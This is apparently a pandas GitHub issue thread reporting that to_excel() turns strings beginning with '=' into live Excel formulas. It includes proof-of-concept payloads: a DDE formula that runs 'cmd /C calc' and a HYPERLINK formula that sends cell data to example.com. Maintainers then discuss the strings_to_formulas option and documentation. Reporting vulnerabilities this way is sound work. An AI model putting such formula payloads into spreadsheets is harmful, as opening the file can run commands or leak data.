Code Sample
import pandas as pd
df = pd.DataFrame([
"simple string",
"=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")
Problem description
When exporting DataFrames to Excel files (.xlsx) , pandas converts strings starting with =
into Excel formulas. This happens with both .xlsx engines (openpyxl and xlsxwriter).
Expected Output
I expect the Excel file to contain a cell with the text:
=2+5+cmd|' /C calc'!A0"
This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).
I'd argue this is a security vulnerability as well.
Security considerations
I think this is is a vulnerability in pandas as it could be used by an attacker to inject Excel formulas in the generated .xslx file: this could be used to trigger shell command execution (when opened in Excel) and data exfiltration (works on LibreOffice as well).
Relationship with CSV injection
This is different from CSV-based injection (but related).
When using the CSV format, cells starting with =
do not have to be considered as formula: this is the consuming software fault if it is processing the data as formula and we can argue [2] that it is not a security issue in the producing software. Moreover there is not clear way to prevent this from happening from the producing software without altering the original data.
However, when exporting to Excel files, each cell can be typed either as string or formula and it is possible to have cells starting with = which are not formulas: it is the producing software responsibility to generate the correct cell.
I would even argue that converting to Excel files instead of CSV files would be a safer route when producing files to be consumed by spreadsheet software because we can prevent this injection from happening.
Example 1: shell command execution
Here's a minimal example (derived from [4]):
import pandas as pd
df = pd.DataFrame([
"simple string",
"=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")
The resulting XSLX file contains:
$ unzip -p pandas_minimal.xlsx xl/worksheets/sheet1.xml | xmllint --format -
<?xml version="1.0"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetPr>
<outlinePr summaryBelow="1" summaryRight="1"/>
<pageSetUpPr/>
</sheetPr>
<dimension ref="A1:A2"/>
<sheetViews>
<sheetView workbookViewId="0">
<selection activeCell="A1" sqref="A1"/>
</sheetView>
</sheetViews>
<sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
<sheetData>
<row r="1">
<c r="A1" t="inlineStr">
<is>
<t>simple string</t> <!-- This is a plain string. -->
</is>
</c>
</row>
<row r="2">
<c r="A2">
<f>2+5+cmd|' /C calc'!A0</f> <-- This is a formula. -->
<v/>
</c>
</row>
</sheetData>
<pageMargins bottom="1" footer="0.5" header="0.5" left="0.75" right="0.75" top="1"/>
</worksheet>
Notice how the first cell was interpreted as a plain string:
<t>simple string</t>
whereas the second was expanded as a Excel formula:
<f>2+5+cmd|' /C calc'!A0</f>
This happens with both XLSX backends (XlsxWriter) and (OpenPyxl). It could be argued that the problem actually lies in the underlying libraries. It is however possible to prevent the formula injections when using these two libraries. I have patches which fix this issue in pandas (see pull request).
In Excel, this formula can execute a local system command. When used with this payload, Excel actually warns before executing the shell command [1]:
Remote data not accessible
To access this data Excel needs to start another application. Some legitimate applications and your computer could be used maliciously to spread viruses or damage your computer. Only click Yes if you trust the source of this workbook and you want to let the workbook start the application.
The Excel file might actually be coming from a trusted source (a trusted pandas script executed from a trusted environment): the user would then legitimately want to click on "Yes". However, an attacker could exploit this behavior in pandas to inject a malicious formula in the trusted Excel file.
Example 2: data exfiltration
Another possibility (which can be triggered through LibreOffice) is data exfiltration from the Excel file to a remote server:
Let's take this example (derived from [3]):
import pandas as pd
df = pd.DataFrame([
"some data",
'=HYPERLINK("http://www.example.com?leak="&B2,"Error, click for details")',
])
df.to_excel("data-exfiltration.xlsx")
It generates a link to:
http://www.example.com/?leak=some%20data
Clicking on this link can be used to exfiltrate data (in this case, the B2 cell from the spreadsheet to a remote server.
References
[1] https://youtu.be/C1o5uVOaufU?t=364 [2] https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection [3] https://www.notsosecure.com/data-exfiltration-formula-injection/ [4] http://georgemauer.net/2017/10/07/csv-injection.html
Resolution
I think the proper way to handle this is to disable Excel formula injection through .to_excel().
If this behavior is useful for some user, this might be controlled with a parameter of .to_excel(). In this case, the documentation should probably include a warning about the security implications of enabling this feature. I believe it would be safer to disable this option by default at some point (eg. for pandas 1.0).
Output of pd.show_versions()
commit: None python: 3.7.5.candidate.1 python-bits: 64 OS: Linux OS-release: 5.2.0-3-amd64 machine: x86_64 processor: byteorder: little LC_ALL: None LANG: fr_FR.utf8 LOCALE: fr_FR.UTF-8 pandas: 0.23.3 pytest: 3.10.1 pip: 18.1 setuptools: 41.2.0 Cython: None numpy: 1.16.5 scipy: 1.2.2 pyarrow: None xarray: None IPython: 5.8.0 sphinx: None patsy: None dateutil: 2.7.3 pytz: 2019.2 blosc: None bottleneck: None tables: 3.5.2 numexpr: 2.7.0 feather: None matplotlib: 3.0.2 openpyxl: 2.4.9 xlrd: 1.1.0 xlwt: 1.3.0 xlsxwriter: None lxml: 4.4.1 bs4: 4.8.0 html5lib: 1.0.1 sqlalchemy: None pymysql: None psycopg2: None jinja2: 2.10.1 s3fs: None fastparquet: None pandas_gbq: None pandas_datareader: None
Comment From: TomAugspurger
This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).
Why do you think that? It's not clear to me one way or another.
It could be argued that the problem actually lies in the underlying libraries.
The default behavior of both of openpyxl and xlsxwriter is to treat strings starting with =
as formula? I'd prefer to not take an opinion, and instead defer to the default behavior of the underlying engines. An config option would probably be welcome (cc @WillAyd if you have thoughts).
Comment From: randomstuff
Why do you think that? It's not clear to me one way or another.
One reason why I think this should not happen by default is that it's not documented. There is no reason for tabular data cells starting with =
to turn into script. There is not even anything special about the XSLX file format with cells starting with =
AFAIU.
One other reason why I think this should not happen (or at least be configurable) is that the pandas user might legitimately need to generate cells with text/data starting with =
. It's currently not possible using .to_html()
.
One last reason is that this can be a security vulnerability. :)
The default behavior of both of openpyxl and xlsxwriter is to treat strings starting with = as formula?
Yes, this is the default behavior of these librairies.
I think this behavior of these libraries is discutable as it can easily open security issues in software using these librairies. It's trying to be helpful but it really is dangerous (*). It would probably be better for them to migrate to a safer default (and warn about the security considerations around this) and add warnings about this in the documenration.
However, both libraries provide a way to prevent this from happening which is actually not possible in pandas.
(*): This is not unlike PyYaml moving away from unsafe YAML loading by default. Using unsafe YAML loading by default was very convenient but was quite dangerous.
Comment From: TomAugspurger
Have you opened issues with openpyxl and xlwt?
Comment From: randomstuff
I did not (yet) because I did not consider it was clearly a vulnerability in openpyxl and xlsxwriter.
Comment From: gfyoung
FWIW: I think we also had a Tidelift discussion for this too...
Comment From: jreback
However, both libraries provide a way to prevent this from happening which is actually not possible in pandas
how is this true at all? we pass thru construction options already; xlxswriter has an option for safe handling and that is our default engine
Comment From: TomAugspurger
It seems xlsxwritier isn't going to change their default: https://github.com/jmcnamara/XlsxWriter/issues/663
At this point, I think the best option is to add an example to the pandas docs about how to properly pass through the option to the engine. Are you interested in working on that @randomstuff?
Comment From: jmcnamara
At this point, I think the best option is to add an example to the pandas docs about how to properly pass through the option to the engine.
For reference, here is an example from the XlsxWriter docs that shows how to pass XlsxWriter options via the Pandas interface.
https://xlsxwriter.readthedocs.io/working_with_pandas.html#passing-xlsxwriter-constructor-options-to-pandas
Comment From: randomstuff
https://xlsxwriter.readthedocs.io/working_with_pandas.html#passing-xlsxwriter-constructor-options-to-pandas
Would it make sense to be able to pass options
in to_html()
instead of having to explicitely use a pd.ExcelWriter`?
Comment From: randomstuff
Wouldn't it better to make formula expansion an optin? It would be a slight breaking change in the API but it would make the API Excel output more consistent with the other ones by default:
import pandas as pd
df = pd.DataFrame(["=a"])
df.to_excel("test.xlsx")
df.to_html("test.html")
People actually needing formula would only need to add an option to to_excel()
.
@TomAugspurger, Yes, I might be interested in doing that. If formula expansion (by default) is considered a feature instead of a bug, I think I should document about this behavior in the to_excel()
documentation and warn about the security implications.
Comment From: geronimos
Is this issue still under discussion, or can it be closed?
It seems that this has been addressed in #42214, which fixed the ability to pass engine_kwargs to ExcelWriter. By setting engine_kwargs={"options": {"strings_to_formulas": False}}
, formulas can be treated as plain text when writing to Excel using the xlsxwriter engine.
Example
import pandas as pd
df = pd.DataFrame({"A": ["=SUM(B2:B3)", "Text", "=A2+B2"], "B": [1, 2, 3]})
# Write formulas as plain text
df.to_excel(
"output.xlsx",
index=False,
engine="xlsxwriter",
engine_kwargs={"options": {"strings_to_formulas": False}},
)
# Write formulas as actual formulas
df.to_excel(
"formula_output.xlsx",
index=False,
engine="xlsxwriter",
)
This behavior isn't explicitly documented, especially in terms of security concerns, but the functionality seems to be in place. Would it make sense to close this issue, or is further clarification needed in the documentation?
Comment From: randomstuff
I think it would definitely be useful to add info about the security considerations in the documentation.
Would it make sense to make this the default? I would consider such a change to be a bugfix but this could be considered a breaking change.
Comment From: TomAugspurger
Improvements to the documentation would be great. Changes to the default behavior would be backwards incompatible and IMO not worth pursuing.
Comment From: randomstuff
Changes to the default behavior would be backwards incompatible and IMO not worth pursuing.
I would argue that the current behavior is not documented and unexpected and is therefore a bug (as well as a potential vulnerability) but I agree that someone somewhere might actually rely on this undocumented and unexpected behavior and would consider this a breaking change :)